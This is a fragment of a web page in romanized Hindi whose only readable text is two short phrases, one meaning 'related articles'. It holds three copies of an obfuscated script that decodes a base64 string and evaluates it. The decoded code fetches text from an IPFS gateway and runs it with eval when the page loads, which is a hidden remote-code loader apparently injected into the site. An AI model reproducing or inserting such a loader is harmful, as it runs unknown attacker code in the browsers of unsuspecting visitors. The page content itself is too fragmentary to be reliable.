<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>